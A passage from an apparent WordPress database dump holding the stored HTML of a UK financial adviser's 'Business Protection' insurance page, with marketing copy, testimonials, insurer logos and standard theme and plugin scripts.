navigationVOffset:20,\r\n\r\n						soloArrowLeftHalign:\"left\",\r\n						soloArrowLeftValign:\"center\",\r\n						soloArrowLeftHOffset:20,\r\n						soloArrowLeftVOffset:0,\r\n\r\n						soloArrowRightHalign:\"right\",\r\n						soloArrowRightValign:\"center\",\r\n						soloArrowRightHOffset:20,\r\n						soloArrowRightVOffset:0,\r\n								\r\n						shadow:2,\r\n						fullWidth:\"off\",\r\n						fullScreen:\"off\",\r\n\r\n						spinner:\"spinner0\",\r\n						\r\n						stopLoop:\"off\",\r\n						stopAfterLoops:-1,\r\n						stopAtSlide:-1,\r\n\r\n						\r\n						shuffle:\"off\",\r\n						\r\n												\r\n												\r\n												\r\n												\r\n												\r\n						hideThumbsOnMobile:\"off\",\r\n						hideNavDelayOnMobile:1500,						hideBulletsOnMobile:\"off\",\r\n						hideArrowsOnMobile:\"off\",\r\n						hideThumbsUnderResolution:0,\r\n						\r\n						hideSliderAtLimit:0,\r\n						hideCaptionAtLimit:0,\r\n						hideAllCaptionAtLilmit:0,\r\n						startWithSlide:0,\r\n						videoJsPath:\"http://www.equalitywalk.org.uk/wp-content/plugins/revslider/rs-plugin/videojs/\",\r\n						fullScreenOffsetContainer: \"\"	\r\n					});\r\n				\r\n				});	//ready\r\n				\r\n			]]></script><!-- END REVOLUTION SLIDER --></div>&#13;\n		&#13;\n																<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n			<div id=\"content\" style=\"width:100%\">&#13;\n				<div id=\"post-7189\" class=\"post-7189 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Business Protection</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n			<span class=\"updated\" style=\"display: none;\">2017-12-02T10:08:38+00:00</span>&#13;\n																								<div class=\"post-content\">&#13;\n				<div id=\"\" class=\"fullwidth-box\" style=\"background-color:#ffffff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:0px;padding-bottom:20;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<h1 style=\"text-align: center;\">Business Protection</h1>&#13;\n<h3 style=\"text-align: center;\">1 in 10 business owners would expect their business to stop trading right away if a key person died, and 61%<sup>2</sup> say that losing a key person would have a major  impact on their business&#13;\n<div class=\"clearboth\"/><div class=\"demo-sep sep-double\" style=\"margin-top:20px;margin-bottom:20px;\"/><div class=\"one_half\"> <style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:#f6f6f6 !important;border-width:1px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><h2>Business Protection - We Make it Simple</h2><p/>&#13;\n<p>Our Aim - to protect your business should a key person, partner or director die or contract a critical illness ensuring that your business can continue trading in these circumstances.</p>&#13;\n<p>Running a business always involves an element of uncertainty. Premises can be rebuilt, plant or products replaced, but the recovery of a person is not nearly as clear cut, regardless of whether that person is an employee or the owner.</p>&#13;\n<p> </p>&#13;\n<p>There are no guarantees that someone who has suffered a major health crisis will be able to perform at the same level as previously or even return to work. That’s why it’s especially important that critical illness cover, as well as life cover, is in place to help ensure that the business can cope with the loss.</p>&#13;\n<p> </p>&#13;\n<p>We’re dedicated to helping you make the right life insurance choices. Not the best choice for us, or the most expensive – simply the best choice for you and your unique circumstances.</p>&#13;\n<p> </p>&#13;\n<p>Our advice is honest, frank and regulated for your reassurance – whether you buy from us or not, we want to leave you feeling more in control of your options.</p>&#13;\n<p> </p>&#13;\n<p/></section></div></div><div class=\"one_half last\"><div class=\"accordian\"><h5 class=\"toggle active\"><a href=\"#\"><span class=\"arrow\"/>How we will help you make the Life Insurance choices</a></h5><div class=\"toggle-content default-open\" style=\"display: block;\">&#13;\n<p><b>Right Cover<br/></b>Lump sum or regular income? Not too much or too little, we’ll find you the cover to suit your situation and your budget?<!--?xml:namespace prefix = \"o\" ns = \"urn:schemas-microsoft-com:office:office\" /--></p>&#13;\n<p><b>Better Prices</b><br/>&#13;\nWe’ll save on your premiums, but we don’t just hide behind a marked down price. Our discounts are always on the right insurance policy for you.</p>&#13;\n<p><b>Better Small Print</b><br/>&#13;\nAs we’ve said already, life insurance simply has to pay out. We maximise your chances by reducing or mitigating any exclusions from your policy.</p>&#13;\n</div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>What is Partner/Director Share Protection</a></h5><div class=\"toggle-content \" style=\"display: none;\">&#13;\n<p>The loss of a partner or director may destabilise the business and can quickly lead to financial difficulties. Partner/Director Share Protection means if the worst does happen, the remaining directors or partners can stay in control of the business.</p></div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Our Promise</a></h5><div class=\"toggle-content \" style=\"display: none;\">We stand for honesty – advice – trust and value. Our culture and people matter and promise you this, the team that makes Equity SMART work will be centred on you. Our team believe in treating clients like family, so you can be confident that we’ll give you the same advice we would give to our own relatives.</div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Our Insurance Philosophy</a></h5><div class=\"toggle-content \" style=\"display: none;\">We believe in a “Get Rich Slowly” philosophy through a “passive investment” approach to purchasing investments. This we believe is the right choice for the majority of investors who are seeking more peace of mind, when looking to achieve sustained performance over the longer term.&#13;\n<ul><li>Passive investment is the rational, mathematically proven route to investing success.</li>&#13;\n<li>Our investment strategies are focused on your risk profile, well researched, efficient and low maintenance.</li>&#13;\n<li>We look to keep your costs low through longer term appreciation, reduced maintenance and look to avoid unnecessary trading.</li>&#13;\n<li>Ensure you are not over exposed at any time through wide diversification of your asset classes.</li>&#13;\n<li>We provide regular reviews and rebalancing when required or on a 6 monthly or yearly basis.</li>&#13;\n</ul></div></div> <div class=\"clearboth\"/><div class=\"demo-sep sep-none\" style=\"margin-top:18px;\"/><a class=\"button-1 button large e.g. green\" title=\"\" href=\"../contact-us/\" target=\"\">Click For A Free Business Protection Review</a></div><div class=\"clearboth\"/> </h3></div></div> <div id=\"\" class=\"fullwidth-box\" style=\"background-color:#ffffff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:15px;padding-bottom:0;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"> <div class=\"title\"><h2>Kind Words &amp; Praise</h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <div class=\"one_half\"> <style type=\"text/css\"><![CDATA[\r\n		#testimonials-1 q{background-color:#f6f6f6 !important;color:#747474 !important;}\r\n		#testimonials-1 .review blockquote div:after{border-top-color:#f6f6f6 !important;}\r\n		]]></style><div id=\"testimonials-1\" class=\"reviews clearfix\"/> <div class=\"review male\"><blockquote><q>“Very pleased with the service provided. Highly professional and standard of information provided was very comprehensive. I was kept informed at all stages of the process.”</q><div class=\"clearfix\"><span class=\"company-name\">Stephen McCoy</span></div></blockquote></div></div> <div class=\"one_half last\"><style type=\"text/css\"><![CDATA[\r\n		#testimonials-2 q{background-color:#f6f6f6 !important;color:#747474 !important;}\r\n		#testimonials-2 .review blockquote div:after{border-top-color:#f6f6f6 !important;}\r\n		]]></style><div id=\"testimonials-2\" class=\"reviews clearfix\"> <div class=\"review male\"><blockquote><q>“I found the staff who I personally dealt with very friendly helpful and professional and the people on the other side of the phone exceptionally friendly too.”</q><div class=\"clearfix\"><span class=\"company-name\">M Patterson</span></div></blockquote></div> </div> </div><div class=\"clearboth\"/>&#13;\n<p>We Compare All The Leading Insurance. Here are a Few You Might Recognise:</p>&#13;\n<div class=\"images-carousel-container related-posts related-projects \"><div id=\"carousel\" class=\"clients-carousel es-carousel-wrapper\"><div class=\"es-carousel\"><ul><li><a href=\"../wp-content/uploads/2013/05/axa.jpg\" target=\"\" title=\"\"><img src=\"../wp-content/uploads/2013/05/axa.jpg\" alt=\"\"/></a></li><li><a href=\"../wp-content/uploads/2013/05/aegon.jpg\" target=\"\" title=\"\"><img src=\"../wp-content/uploads/2013/05/aegon.jpg\" alt=\"\"/></a></li><li><a href=\"../wp-content/uploads/2013/05/aviva.jpg\" target=\"\" title=\"\"><img src=\"../wp-content/uploads/2013/05/aviva.jpg\" alt=\"\"/></a></li><li><a href=\"../wp-content/uploads/2013/05/friendslife.jpg\" target=\"\" title=\"\"><img src=\"../wp-content/uploads/2013/05/friendslife.jpg\" alt=\"\"/></a></li><li><a href=\"../wp-content/uploads/2013/05/Standard_Life_logo1.png\" target=\"\" title=\"\"><img src=\"../wp-content/uploads/2013/05/Standard_Life_logo1.png\" alt=\"\"/></a></li><li><a href=\"../wp-content/uploads/2013/05/legal-and-general.gif\" target=\"\" title=\"\"><img src=\"../wp-content/uploads/2013/05/legal-and-general.gif\" alt=\"\"/></a></li><li><a href=\"../wp-content/uploads/2013/05/prudential.jpg\" target=\"\" title=\"\"><img src=\"../wp-content/uploads/2013/05/prudential.jpg\" alt=\"\"/></a></li></ul><div class=\"es-nav\"><span class=\"es-nav-prev\">Previous</span><span class=\"es-nav-next\">Next</span></div></div></div></div></div></div> <div id=\"\" class=\"fullwidth-box\" style=\"background-color:#ffffff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:20px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"><style type=\"text/css\"><![CDATA[#reading-box-container-2 .tagline-shadow:before,#reading-box-container-2 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-2\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#fafafa !important;border-width:0px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"\" class=\"continue button large default\">Book Now</a><h2>It’s all so simple. To book a chat with our business protection experts, click the link.</h2><p>It\'s free, and we think you\'ll like what you hear.</p><a href=\"../contact-us/\" target=\"\" class=\"continue mobile-button button large default\">Book Now</a></section></div></div></div>&#13;\n							</div>&#13;\n																	</div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"display:none\"><div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>subscribers who get new content from us on a monthly basis</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../new-individual-savings-accounts/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\n									<div class=\"meta\">&#13;\n										May 14th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../get-auto-enrolment/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../get-auto-enrolment/\">How To Get The Most From Auto-Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										May 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../may-2014-stock-market-bulletin/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../may-2014-stock-market-bulletin/\">May 2017 Stock Market Bulletin</a>&#13;\n									<div class=\"meta\">&#13;\n										May 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../bank-left-stranded-without-financial-adviser/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../bank-left-stranded-without-financial-adviser/\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\n									<div class=\"meta\">&#13;\n										April 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../april-2014-stock-market-bulletin/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../april-2014-stock-market-bulletin/\">April 2017 Stock Market Bulletin</a>&#13;\n									<div class=\"meta\">&#13;\n										April 2nd, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (3)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (7)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"1\">Wealth Management  (16)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-4\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../get-auto-enrolment/\">How To Get The Most From Auto-Enrolment</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../may-2014-stock-market-bulletin/\">May 2017 Stock Market Bulletin</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../bank-left-stranded-without-financial-adviser/\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>Established for over 20 years we work with individuals, families and owner managed businesses countrywide, helping them organise; plan; protect and achieve the future they choose, through \"hands on\" objective and realistic financial advice they can depend on.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-22\" class=\"footer-widget-col widget_text\"><p>Download FREE Guides</p>			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/1435eb973f72a2%3A125d9572eb46dc/5753952654065664/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../w3QPpbD3DJXcyqPrBaexcUOnTpQKlOX0XuzNYejlD3Hwl1wrM5qbyjoyp4eUJt-wEdlJsAojFjru39Y0ZjrDnA_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-689.js\"/></div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col last\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul><div style=\"clear:both;\"/></div>				</article></section></div>&#13;\n	</footer><footer id=\"footer\"/></div><!-- wrapper -->&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/><script type=\"text/javascript\" src=\"../scripts.hellobar.com/565e6e29d8b6bfca77549154aee8b14f23536824.js\"/></body>','Business Protection','','inherit','closed','closed','','57-revision-v1','','','2017-09-21 16:59:30','2017-09-21 16:59:30','',57,'http://www.equalitywalk.org.uk/57-revision-v1',0,'revision','',0),(303,1,'2017-09-21 17:01:12','2017-09-21 17:01:12','&nbsp;\r\n<div style=\"position: absolute; top: 0px; left: 50%; margin-left: -475px;\">\r\n\r\n&nbsp;\r\n<table border=\"0\" width=\"950\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"10\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"18\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"14\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"29\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"49\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"78\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"16\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"30\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"109\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"44\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"109\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"118\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"11\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"29\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"138\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"129\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"19\" height=\"1\" border=\"0\" /></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"1\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td class=\"header\" style=\"background-image: url(\'/images/index_r1_c1.jpg\'); background-repeat: no-repeat;\" colspan=\"17\" valign=\"top\"><a href=\"/wealth-management-faqs\">wealth management FAQs</a> - <a href=\"/wealth-management-glossary\">glossary of wealth management terms</a> - <a href=\"/additional/financial-calendar\">financial calendar</a></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"38\" border=\"0\" /></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"17\"></td>\r\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"27\" border=\"0\" 